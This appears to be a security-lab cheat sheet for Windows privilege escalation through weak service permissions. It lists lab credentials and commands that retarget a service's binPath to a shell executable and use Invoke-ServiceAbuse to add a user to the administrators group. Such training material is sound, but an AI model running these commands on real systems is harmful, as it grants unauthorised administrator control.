⚠️ Pracivo Security Lab — Windows privilege escalation techniques. Start as low-privilege user, escalate to SYSTEM or Administrator.
Lab Credentials: ram / pracivo | alice / alice123 | administrator / Admin@2024 (goal: escalate to this)
Weak Service Permissions
PRIVILEGE ESCALATION
accesschk.exe -ucqv * /accepteula | findstr "RW"
accesschk.exe -ucqv VulnService /accepteula
sc config VulnService binPath= "C:\temp\shell.exe"
sc config VulnService obj= ".\LocalSystem" password= ""
net stop VulnService
net start VulnService
Get-ModifiableService | Invoke-ServiceAbuse -Command "net localgroup administrators ram /add"
net localgroup administrators